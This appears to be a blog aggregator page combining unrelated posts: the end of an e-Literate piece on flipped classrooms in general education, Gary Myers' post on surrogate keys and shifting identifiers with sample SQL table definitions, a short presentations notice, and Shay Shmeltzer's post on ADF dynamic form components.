Students are used to getting their information online. They are also often very effective at “time slicing,” in which they use small increments of time (e.g., when they are on a bus or waiting for an appointment) to get things done. This exemplar practice enables students to do that with the portions of academic work that are suited to it while preserving and actually expanding room for long and deep academic discussion.

What does it take to make the practice work? What is the impact on faculty time? Does it take a team to design, implement, assess? What are the implications for organizational change?

The redesign effort is significant and, because the creation of significant digital resources is involved, is often best done by a team (although that is not strictly necessary). For the purposes of this design, the homework platform need not be cutting-edge adaptive, as long as it provides formative assessments that are consistent with the summative assessments and provides both students and instructors with good, regular feedback. That said, implementing the technology is often not seamless and may take several semesters to work the kinks out. The shift to a flipped classroom also puts new demands on students and may take several semesters for the campus culture to adjust to the new approach.

How is it applicable to gen ed (if example doesn’t come from gen ed)?

This model is often used in Gen Ed. It is particularly appropriate for larger classes where the DFW rate is high and where a significant percentage of the subject matter—at least the foundational knowledge on the lower rungs of Bloom’s taxonomy—can be assessed through software.

Are there references or literature to which you can point that is relevant to the practice?

http://mfeldstein.com/efficacy-adaptive-learning-flipped-classroom/

http://mfeldstein.com/efficacy-adaptive-learning-flipped-classroom-part-ii/

http://www.thencat.org/PlanRes/R2R_Model_Rep.htm

http://www.thencat.org/PCR/R3/TCC/TCC_Overview.htm

http://www.flippedlearning.org/

The post AAC&U GEMs: Exemplar Practice appeared first on e-Literate.

Unique identifiers - but what do they identify

Gary Myers - Fri, 2014-04-11 22:39
Most of the readers of this blog will be developers or DBAs who got the rules of Normalisation drummed into them during some phase of their education or training. But often we get to work with people who don't have that grounding. This post is for them. Feel free to point them at it.

Through normalisation, the tendency is to start with a data set, and by a methodical process extract candidate keys and their dependent attributes. In many cases there isn't a genuine or usable candidate key and artificial / surrogate keys need to be generated. While your bank can generally work out who you are based on your name and address, either of those could change and so they assign you a more permanent customer or account number.
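
As a minimal sketch (table and column names are purely illustrative), that separation of a stable surrogate identifier from changeable attributes might look like this:

create sequence customer_seq;

create table customer (
    customer_id  number        not null,   -- surrogate key: assigned once, never changes
    full_name    varchar2(100) not null,   -- can change
    address      varchar2(200),            -- can change
    constraint customer_pk primary key (customer_id)
);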

The difficulty comes when those identifiers take on a life of their own. 

Consider the phone number. When I dial my wife's phone number, out of all the phones in Australia (or the world), it is hers alone that will ring. Why that one?

In the dark ages, the phone number would indicate a particular exchange and a copper wire leading out of that exchange, hard-wired to a receiver (or a set of receivers in the case of Party Lines).  Now all the routing is electronic, telephones can be mobile and the routing for calls to a particular number can be changed in an instant. A phone number no longer identifies a device, but a service, and a new collection of other identifiers has risen up to support the implementation of that service. An IMEI can identify a mobile handset and the IMSI indicates a SIM card from a network provider, and we can change the SIM card / IMSI that corresponds to a phone number, or swap SIM cards between handsets. Outside the cellular world, VOIP can shunt 'phone number' calls around innumerable devices using IP addresses.

Time is another factor. While I may 'own' a given phone number at a particular time, I may give that up and someone else might take it over. That may get represented by adding dates, or date ranges to the key, or it can be looked at as a sequence. For example, Elizabeth Taylor's husband may indicate one of seven men depending on context. The "fourth husband" or "her husband on 1st Jan 1960" would be Eddie Fisher.
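
One way (purely illustrative, names invented) of representing that kind of time-bounded ownership is to make the date range part of the key:

create table phone_service_history (
    phone_number    varchar2(15) not null,
    imsi            varchar2(15),               -- SIM mapped to the number for this period
    effective_from  date         not null,
    effective_to    date,                       -- null = current mapping
    constraint phone_service_history_pk
        primary key (phone_number, effective_from)
);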

Those without a data modelling background that includes normalisation may flinch at the proliferation of entities and tables in a relational environment. As developers and architects look at newer technologies some of the discipline of the relational model will be passed over. Ephemeral transactions can cluster the attributes together in XML or JSON formats with no need for consistency of data definitions beyond the period of processing. Data warehousing quickly discarded relational formats in favour of 'facts' and 'dimensions'. 

The burden of managing a continuous and connected set of data extending over a long period of time, during which the identifiers and attributes morph, is an ongoing challenge in database design.

Supplement: Régionales 2014 ... the presentations

Jean-Philippe Pinte - Fri, 2014-04-11 22:12
Find the presentations given during the Régionales 2014:


Dynamic ADF Forms with the new Dynamic Component (and synch with DB)

Shay Shmeltzer - Fri, 2014-04-11 17:22

I wrote a couple of blog posts in the past that talked about creating dynamic UIs based on a model layer that changes (example1, example2). Well, in 12c there is a new ADF Faces component, af:dynamicComponent, that makes dynamic forms even more powerful. This component can be displayed as various UI components at runtime, which allows us to create forms and tables with full functionality in a dynamic way.

In fact, we use this when you create either a form or a table component in your JSF page by dragging over a data control. We now allow you to avoid specifying each field in your UI and instead just say that you want to show all the fields in the data control.

In the demo below I show you how this is done, and then review how your UI automatically updates when you add fields in your model layer. For example, if your DB changed and you used "Synchronize with DB" to add the field to the VO, that's it: no more need to go to every page and add the new field.

Check it out:


Categories: Development